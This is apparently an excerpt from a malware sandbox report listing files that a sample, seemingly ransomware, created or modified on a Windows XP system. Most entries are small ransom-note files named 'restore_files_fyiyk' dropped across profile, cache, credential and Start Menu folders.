    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Templates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Recent\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Recent\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (1181 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ip[1].htm (15 bytes)
    C:\totalcmd\LANGUAGE\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.html (5 bytes)
    C:\System Volume Information\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\restore_files_fyiyk.txt (2 bytes)
    C:\totalcmd\DEFAULT.BAR (2816 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\restore_files_fyiyk.html (5 bytes)
    %System%\config\software (2374 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Wireshark\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Wireshark\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Videos\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\My Documents\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt (1116 bytes)
    %Documents and Settings%\Default User\Templates\excel.xls (427 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma (6148 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Music\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Videos\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Cookies\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma (7698 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\AU\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\History\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\brndlog.txt (436 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Cookies\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Templates\winword2.doc (419 bytes)
    %Documents and Settings%\Default User\Local Settings\Temp\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Start Menu\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
    C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\NetHood\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg (1157 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\excel.xls (427 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
